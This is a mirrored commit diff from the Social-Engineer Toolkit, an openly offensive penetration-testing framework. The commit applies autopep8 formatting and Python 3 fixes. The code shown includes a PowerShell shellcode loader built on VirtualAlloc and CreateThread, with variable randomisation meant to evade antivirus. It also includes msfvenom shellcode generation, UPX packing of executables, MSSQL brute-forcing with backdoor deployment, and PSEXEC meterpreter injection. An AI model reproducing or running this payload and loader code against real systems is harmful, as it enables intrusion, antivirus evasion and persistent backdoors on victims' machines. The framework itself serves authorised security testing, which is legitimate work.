Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-03-03 06:47:31 +00:00
Code Issues Projects Releases Packages Wiki Activity

fixes for autopep8 and python3 compatibility

Browse source
This commit is contained in:
TrustedSec 2016-06-27 10:30:11 -04:00
parent 3cddcdefd5
commit bef8ce8eb0
5 changed files with 228 additions and 151 deletions

1
readme/CHANGELOG
View file

@ -14,6 +14,7 @@ version 7.2
* added a new check upon startup (which may delay the start of set for a couple seconds, but it will check to see if there is a new version of SET available for you automatically - this is displayed on the main launcher UI when you first start SET
* fixed setup.py a bit to reflect more on whats out there.. I may convert this to a standard setup installer eventually
* updated the licensing agreement - should check it out - some bold things you need to do in order to use SET!
* changed the default payload in HTA and Java Applet attack to be reverse_https instead of reverse_tcp (although both can be specified)
~~~~~~~~~~~~~~~~
version 7.1.2

31
setoolkit
View file

@ -32,7 +32,8 @@ if not os.path.isfile("/etc/setoolkit/set.config"):
# here we check to ensure we have the latest version
data = open("/etc/setoolkit/set.config", "r").read()
if not "CONFIG_VERSION=7.2" in data:
print ("[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
print (
"[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
shutil.move("/etc/setoolkit/set.config", "/etc/setoolkit/set.config.bak")
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")
@ -75,13 +76,14 @@ try:
from Crypto.Cipher import AES
except ImportError:
print("[!] The python-pycrypto python module not installed. You will lose the ability to use multi-pyinjector.")
print(
"[!] The python-pycrypto python module not installed. You will lose the ability to use multi-pyinjector.")
pass
#########################################
#
# The Social-Engineer Toolkit (SET) #
# Written by: David Kennedy (ReL1K) #
#########################################
#
#
# this is the main menu structure for SET
@ -93,7 +95,8 @@ update_config()
# chmod routine
if operating_system == "posix":
# change permissions if nix
subprocess.Popen("chmod +x seautomate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py",
subprocess.Popen(
"chmod +x seautomate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
dns = check_config("DNS_SERVER=")
@ -125,13 +128,15 @@ for root, dirs, files in os.walk(setdir):
# if windows then do some stuff
if operating_system == "posix":
################################################
#
# ROOT CHECK
################################################
#
if os.geteuid() != 0:
print ("\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)")
print ("\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n")
print (
"\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)")
print (
"\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n")
exit_set()
# if there isn't a set_config.py file yet, create one
@ -204,12 +209,14 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# rance
if main_menu_choice == "rance":
print_warning(bcolors.BOLD + "We miss you buddy. David Jones (Rance) changed a lot of us and you'll always be apart of our lives (and SET). Fuck Cancer." + bcolors.ENDC)
print_warning(
bcolors.BOLD + "We miss you buddy. David Jones (Rance) changed a lot of us and you'll always be apart of our lives (and SET). Fuck Cancer." + bcolors.ENDC)
pause = raw_input("Press {return} to continue.")
# cavs
if main_menu_choice == "cavs":
print_warning(bcolors.BOLD + "2015-2016 CHAMPS BABY!!! C l e e e e e e v eeee l a a n n d d d d d d d d d d d " + bcolors.ENDC)
print_warning(
bcolors.BOLD + "2015-2016 CHAMPS BABY!!! C l e e e e e e v eeee l a a n n d d d d d d d d d d d " + bcolors.ENDC)
pause = raw_input("Press {return} to continue.")
# quit out
@ -263,7 +270,7 @@ except KeyboardInterrupt:
" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"))
# handle exceptions
#except Exception as error:
# except Exception as error:
# log(error)
# print ("\n\n[!] Something went wrong, printing the error: "+ str(error))

161
src/core/fasttrack.py
View file

@ -12,9 +12,9 @@ definepath = os.getcwd()
#
try:
while 1:
###################################################
# USER INPUT: SHOW WEB ATTACK MENU #
###################################################
#
# USER INPUT: SHOW WEB ATTACK MENU #
#
create_menu(text.fasttrack_text, text.fasttrack_menu)
attack_vector = raw_input(setprompt(["19"], ""))
@ -22,11 +22,11 @@ try:
if attack_vector == "99" or attack_vector == "quit" or attack_vector == "exit":
break
##################################
##################################
#
#
# mssql_scanner
##################################
##################################
#
#
if attack_vector == "1":
# start the menu
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
@ -38,7 +38,8 @@ try:
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print("\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
print(
"\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
if choice != "1":
@ -91,37 +92,43 @@ try:
print_status(
"Hunting for SQL servers.. This may take a little bit.")
if "/" or " " in str(range):
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
for host in iprange:
sqlport = get_sql_port(host)
if sqlport == None:
sql_nmap_scan(host)
if sql_nmap_scan != None:
sql_servers = sql_servers + host + ":" + "1433" + ","
if sqlport != None:
sql_servers = sql_servers + host + ":" + sqlport + ","
else:
range1 = range.split(" ")
for ip in range1:
sqlport = get_sql_port(ip)
if sqlport == None:
sql_nmap_scan(ip)
if sql_nmap_scan != None:
sql_servers = sql_servers + ip + ":" + "1433" + ","
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
for host in iprange:
sqlport = get_sql_port(host)
if sqlport == None:
sql_nmap_scan(host)
if sql_nmap_scan != None:
sql_servers = sql_servers + \
host + ":" + "1433" + ","
if sqlport != None:
sql_servers = sql_servers + \
host + ":" + sqlport + ","
else:
range1 = range.split(" ")
for ip in range1:
sqlport = get_sql_port(ip)
if sqlport == None:
sql_nmap_scan(ip)
if sql_nmap_scan != None:
sql_servers = sql_servers + \
ip + ":" + "1433" + ","
if sqlport != None:
sql_servers = sql_servers + ip + ":" + sqlport + ","
if sqlport != None:
sql_servers = sql_servers + \
ip + ":" + sqlport + ","
else:
# use udp discovery to get the SQL server UDP 1434
sqlport = get_sql_port(range)
# if its not closed then check nmap - if both fail then nada
# if its not closed then check nmap - if both fail then
# nada
if sqlport == None:
sql_nmap_scan(host)
if sql_nmap_scan != None:
sql_servers = sql_servers + host + ":" + "1433" + ","
sql_nmap_scan(host)
if sql_nmap_scan != None:
sql_servers = sql_servers + \
host + ":" + "1433" + ","
if sqlport != None:
sql_servers = range + ":" + sqlport
@ -168,10 +175,11 @@ try:
sql_success = mssql.brute(
servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + sql_success + ":"
# after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + \
sql_success + ":"
counter = 1
# if we specified a username list
@ -183,18 +191,22 @@ try:
# we wont break out of the loop here incase
# theres multiple usernames we want to find
if sql_success != False:
master_list = master_list + sql_success + ":"
master_list = master_list + \
sql_success + ":"
counter = 1
# if we didn't successful attack one
if counter == 0:
if sql_servers:
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server on the following SQL servers: ")
for line in sql_servers:
if line != "":
print "SQL Server: " + line.rstrip()
if sql_servers:
print_warning(
"Sorry. Unable to locate or fully compromise a MSSQL Server on the following SQL servers: ")
for line in sql_servers:
if line != "":
print("SQL Server: " + line.rstrip())
else: print_warning("Sorry. Unable to find any SQL servers to attack.")
else:
print_warning(
"Sorry. Unable to find any SQL servers to attack.")
pause = raw_input(
"Press {return} to continue to the main menu.")
# if we successfully attacked one
@ -205,10 +217,11 @@ try:
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status("SET Fast-Track attacked the following SQL servers: ")
for line in sql_servers:
if line != "":
print "SQL Servers: " + line.rstrip()
print_status(
"SET Fast-Track attacked the following SQL servers: ")
for line in sql_servers:
if line != "":
print("SQL Servers: " + line.rstrip())
print_status(
"Below are the successfully compromised systems.\nSelect the compromise SQL server you want to interact with:\n")
for success in master_names:
@ -239,8 +252,10 @@ try:
success = success.split(",")
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) + "," + passwords
print("\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n")
# ipaddr + "," + username + "," + str(port) +
# "," + passwords
print(
"\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n")
option = raw_input(
setprompt(["19", "21", "22"], "Which deployment option do you want [1]"))
if option == "":
@ -325,11 +340,11 @@ try:
print_warning(
"\nIncorrect syntax somewhere. Printing error message: " + str(e))
##################################
##################################
#
#
# exploits menu
##################################
##################################
#
#
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1,
@ -377,11 +392,11 @@ try:
except:
import src.fasttrack.exploits.f5
##################################
##################################
#
#
# sccm attack menu
##################################
##################################
#
#
if attack_vector == "3":
# load sccm attack
try:
@ -389,21 +404,21 @@ try:
except:
import src.fasttrack.sccm.sccm_main
##################################
##################################
#
#
# dell drac default credential checker
##################################
##################################
#
#
if attack_vector == "4":
# load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" %
(definepath), shell=True).wait()
##################################
##################################
#
#
# RID ENUM USER ENUMERATION
##################################
##################################
#
#
if attack_vector == "5":
print (""".______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
@ -413,7 +428,8 @@ try:
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
""")
print("\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
print(
"\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
print("\n")
ipaddr = raw_input(
setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
@ -466,13 +482,14 @@ try:
print_status("Everything is finished!")
pause = raw_input("Press {return} to go back to the main menu.")
##################################
##################################
#
#
# PSEXEC PowerShell
##################################
##################################
#
#
if attack_vector == "6":
print("\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
print(
"\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
try:
module_reload(src.fasttrack.psexec)
except:

151
src/core/setcore.py
View file

@ -1,7 +1,7 @@
#!/usr/bin/env python
##############################################
# Centralized core modules for SET #
##############################################
#
# Centralized core modules for SET #
#
import re
import sys
import socket
@ -17,15 +17,18 @@ import base64
from src.core import dictionaries
import io
import trace
import urllib2
from urllib import *
if sys.version_info >= (3, 0):
# python 3 removes reduce from builtin and into functools
from functools import *
# needed for backwards compatibility of python2 vs 3 - need to convert to threading eventually
try: import thread
except ImportError: import _thread as thread
# needed for backwards compatibility of python2 vs 3 - need to convert to
# threading eventually
try:
import thread
except ImportError:
import _thread as thread
try:
raw_input
@ -38,10 +41,13 @@ try:
except ImportError:
print("[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications.")
print(
"[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications.")
pass
# get the main SET path
def definepath():
if check_os() == "posix":
if os.path.isfile("setoolkit"):
@ -167,7 +173,8 @@ def setprompt(category, text):
if text == "":
for level in category:
level = dictionaries.category(level)
prompt += ":" + bcolors.UNDERL + bcolors.DARKCYAN + level + bcolors.ENDC
prompt += ":" + bcolors.UNDERL + \
bcolors.DARKCYAN + level + bcolors.ENDC
promptstring = str(prompt)
promptstring += ">"
return promptstring
@ -176,7 +183,8 @@ def setprompt(category, text):
# iterate through the list received
for level in category:
level = dictionaries.category(level)
prompt += ":" + bcolors.UNDERL + bcolors.DARKCYAN + level + bcolors.ENDC
prompt += ":" + bcolors.UNDERL + \
bcolors.DARKCYAN + level + bcolors.ENDC
promptstring = str(prompt)
promptstring = promptstring + "> " + text + ":"
return promptstring
@ -203,7 +211,7 @@ def return_continue():
"<return> " + bcolors.ENDC + "to continue"))
pause = raw_input()
############ DEBUGGING ###############
# DEBUGGING ###############
# ALWAYS SET TO ZERO BEFORE COMMIT!
DEBUG_LEVEL = 0
# 0 = Debugging OFF
@ -235,8 +243,8 @@ def mod_name():
calling_module = inspect.getmodulename(frame_records[1])
return calling_module
##########################################
############ RUNTIME MESSAGES ############
#
# RUNTIME MESSAGES ############
def print_status(message):
@ -264,6 +272,7 @@ def get_version():
define_version = '7.2'
return define_version
class create_menu:
def __init__(self, text, menu):
@ -421,7 +430,8 @@ def grab_ipaddress():
# check if IP address is valid
ip_check = is_valid_ip(rhost)
if ip_check == False:
rhost = raw_input("[!] Invalid ip address try again: ")
rhost = raw_input(
"[!] Invalid ip address try again: ")
if ip_check == True:
break
return rhost
@ -605,17 +615,20 @@ def meterpreter_reverse_tcp_exe(port):
# import the system path for payloadgen in SET
sys.path.append("src/core/payloadgen")
try:
debug_msg("setcore", "importing 'src.core.payloadgen.create_payloads'", 1)
debug_msg(
"setcore", "importing 'src.core.payloadgen.create_payloads'", 1)
module_reload(create_payloads)
except:
debug_msg("setcore", "importing 'src.core.payloadgen.create_payloads'", 1)
debug_msg(
"setcore", "importing 'src.core.payloadgen.create_payloads'", 1)
import create_payloads
random_value = generate_random_string(5, 10)
# copy the created executable to program_junk
print_status("Executable created under %s/%s.exe" % (setdir, random_value))
subprocess.Popen("cp %s/msf.exe %s/%s.exe" % (setdir, setdir, random_value),
subprocess.Popen(
"cp %s/msf.exe %s/%s.exe" % (setdir, setdir, random_value),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
#
# Start a metasploit multi handler
@ -720,7 +733,8 @@ def java_applet_attack(website, port, directory):
applet_name = generate_random_string(6, 15) + ".jar"
# lastly we need to copy over the signed applet
subprocess.Popen("cp %s/Signed_Update.jar %s/%s" % (setdir, directory, applet_name),
subprocess.Popen(
"cp %s/Signed_Update.jar %s/%s" % (setdir, directory, applet_name),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# start the web server by running it in the background
@ -855,7 +869,8 @@ def upx(path_to_file):
print_info(
"Packing the executable and obfuscating PE file randomly, one moment.")
# packing executable
subprocess.Popen("%s -9 -q -o %s/temp.binary %s" % (upx_path, setdir, path_to_file),
subprocess.Popen(
"%s -9 -q -o %s/temp.binary %s" % (upx_path, setdir, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# move it over the old file
subprocess.Popen("mv %s/temp.binary %s" % (setdir, path_to_file),
@ -902,28 +917,33 @@ def show_banner(define_version, graphic):
""" + bcolors.GREEN + """ Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
""")
print(bcolors.BLUE + """ Join us on irc.freenode.net in channel #setoolkit\n""" + bcolors.ENDC)
print(bcolors.BLUE +
""" Join us on irc.freenode.net in channel #setoolkit\n""" + bcolors.ENDC)
print(bcolors.BOLD + """ The Social-Engineer Toolkit is a product of TrustedSec.\n\n Visit: """ +
bcolors.GREEN + """https://www.trustedsec.com\n""" + bcolors.ENDC)
# here we check if there is a new version of SET - if there is, then display a banner
# here we check if there is a new version of SET - if there is, then
# display a banner
cv = get_version()
# pull version
try:
response = urllib2.urlopen('https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/setcore.py')
try:
response = urlopen(
'https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/setcore.py')
setcheck = response.readlines()
for line in setcheck:
line = line.rstrip()
if "define_version =" in line:
# define_version = '7.1.2'
version = line.replace("define_version = ", "").replace("'", "", 2).replace(" ", "")
# define_version = '7.1.2'
version = line.replace("define_version = ", "").replace(
"'", "", 2).replace(" ", "")
if cv != version:
print(bcolors.RED + " There is a new version of SET available.\n " + bcolors.GREEN + " Your version: " + bcolors.RED + cv + bcolors.GREEN + "\n Current version: " + bcolors.ENDC + bcolors.BOLD + version + bcolors.YELLOW + "\n\nPlease update SET to the latest before submitting any git issues.\n\n" + bcolors.ENDC)
print(bcolors.RED + " There is a new version of SET available.\n " + bcolors.GREEN + " Your version: " + bcolors.RED + cv + bcolors.GREEN +
"\n Current version: " + bcolors.ENDC + bcolors.BOLD + version + bcolors.YELLOW + "\n\nPlease update SET to the latest before submitting any git issues.\n\n" + bcolors.ENDC)
except Exception as err:
print err
print(err)
def show_graphic():
menu = random.randrange(2, 14)
@ -1136,8 +1156,6 @@ def show_graphic():
``:::::::::''""" + bcolors.ENDC)
#
# identify if set interactive shells are disabled
#
@ -1167,7 +1185,8 @@ def menu_back():
def custom_template():
try:
print (" [****] Custom Template Generator [****]\n")
print ("Always looking for new templates! In the set/src/templates directory send an email\nto info@trustedsec.com if you got a good template!")
print (
"Always looking for new templates! In the set/src/templates directory send an email\nto info@trustedsec.com if you got a good template!")
author = raw_input(setprompt("0", "Enter the name of the author"))
filename = randomgen = random.randrange(1, 99999999999999999999)
filename = str(filename) + (".template")
@ -1201,7 +1220,7 @@ def check_length(choice, max):
while 1:
if counter == 1:
choice = raw_input(bcolors.YELLOW + bcolors.BOLD +
"[!] " + bcolors.ENDC + "Invalid choice try again: ")
"[!] " + bcolors.ENDC + "Invalid choice try again: ")
# try block in case its not a integer
try:
# check to see if its an integer
@ -1461,7 +1480,8 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
# where if it detects 64 bit it'll use x86 powershell. This is useful so
# we don't have to guess if its x64 or x86 and what type of shellcode to
# use
# added random vars before and after to change strings - AV you are seriously ridiculous.
# added random vars before and after to change strings - AV you are
# seriously ridiculous.
var1 = generate_random_string(3, 4)
var2 = generate_random_string(3, 4)
var3 = generate_random_string(3, 4)
@ -1474,12 +1494,15 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % shellcode)
# run it through a lame var replace
powershell_command = powershell_code.replace("$1", "$" + var1).replace("$c", "$" + var2).replace("$2", "$" + var3).replace("$3", "$" + var4).replace("$x", "$" + var5)
powershell_command = powershell_code.replace("$1", "$" + var1).replace(
"$c", "$" + var2).replace("$2", "$" + var3).replace("$3", "$" + var4).replace("$x", "$" + var5)
# unicode and base64 encode and return it
return base64.b64encode(powershell_command.encode('utf_16_le')).decode("ascii")
# generate base shellcode
def generate_shellcode(payload, ipaddr, port):
msf_path = meta_path()
@ -1490,13 +1513,17 @@ def generate_shellcode(payload, ipaddr, port):
data = proc.communicate()[0]
data = data.decode('ascii')
# start to format this a bit to get it ready
#repls = {';': '', ' ': '', '+': '', '"': '', '\n': '',
# repls = {';': '', ' ': '', '+': '', '"': '', '\n': '',
# 'unsigned char buf=': '', 'unsignedcharbuf[]=': ''}
repls = [';', ' ', '+', '"', '\n', 'unsigned char buf=', 'unsignedcharbuf[]=', "b'", "'", '\\n']
for repl in repls: data = data.replace(repl, "")
repls = [';', ' ', '+', '"', '\n', 'unsigned char buf=',
'unsignedcharbuf[]=', "b'", "'", '\\n']
for repl in repls:
data = data.replace(repl, "")
return data
# this will take input for shellcode and do a replace for IP addresses
def shellcode_replace(ipaddr, port, shellcode):
# split up the ip address
ip = ipaddr.split('.')
@ -1560,6 +1587,8 @@ def shellcode_replace(ipaddr, port, shellcode):
return shellcode
# exit routine
def exit_set():
cleanup_routine()
print("\n\n Thank you for " + bcolors.RED + "shopping" + bcolors.ENDC +
@ -1605,6 +1634,8 @@ def metasploit_shellcode(payload, ipaddr, port):
# here we encrypt via aes, will return encrypted string based on secret
# key which is random
def encryptAES(secret, data):
# the character used for padding--with a block cipher such as AES, the value
@ -1677,6 +1708,8 @@ class DNSQuery:
return packet
# main dns routine
def dns():
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udps.bind(('', 53))
@ -1692,10 +1725,14 @@ def dns():
udps.close()
# start dns
def start_dns():
thread.start_new_thread(dns, ())
# the main ~./set path for SET
def setdir():
if check_os() == "posix":
return os.path.join(os.path.expanduser('~'), '.set')
@ -1825,16 +1862,21 @@ def get_sql_port(host):
pass
# this will manually tcp connect if needed
def sql_nmap_scan(ipaddr):
proc = subprocess.Popen("nmap -v -sT -p1433 %s" % (ipaddr), shell=True, stdout=subprocess.PIPE)
output = proc.communicate()[0].split("\n")
result = ""
for result in output:
if "Discovered open port" in result:
result = result.split("on ")[1]
return result
proc = subprocess.Popen("nmap -v -sT -p1433 %s" %
(ipaddr), shell=True, stdout=subprocess.PIPE)
output = proc.communicate()[0].split("\n")
result = ""
for result in output:
if "Discovered open port" in result:
result = result.split("on ")[1]
return result
# capture output from a function
def capture(func, *args, **kwargs):
"""Capture the output of func when called with the given arguments.
@ -1886,6 +1928,8 @@ def check_kali():
return "Non-Kali"
# here we give multiple options to specify for SET java applet
def applet_choice():
# prompt here
@ -1928,18 +1972,24 @@ Select which option you want:
module_reload(src.html.unsigned.verified_sign)
# reload module function for python 2 and python 3
def module_reload(module):
if sys.version_info >= (3,0):
if sys.version_info >= (3, 0):
import importlib
importlib.reload(module)
else:
reload(module)
# used to replace any input that we have from python 2 to python 3
def input(string):
return raw_input(string)
return raw_input(string)
# fetch URL needed for web cloning
def fetch_template():
fileopen = open(setdir + "/site.template").readlines()
for line in fileopen:
@ -1953,7 +2003,7 @@ def fetch_template():
# tail a file
def tail(filename):
if os.path.isfile(filename):
file = open(filename,'r')
file = open(filename, 'r')
st_results = os.stat(filename)
st_size = st_results[6]
file.seek(st_size)
@ -1965,6 +2015,7 @@ def tail(filename):
time.sleep(1)
file.seek(where)
else:
print(line,) # already has newline
print(line,) # already has newline
else: print_error("File not found, cannot tail.")
else:
print_error("File not found, cannot tail.")

35
src/core/update_config.py
View file

@ -113,25 +113,26 @@ def update_config():
CONFIG_DATE='""" + timestamp + """'\n""")
for line in init_file:
try:
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
quoted = value_type(setting)
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + '=' + value + '\n')
except: pass
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + '=' + value + '\n')
except:
pass
init_file.close()
new_config.close()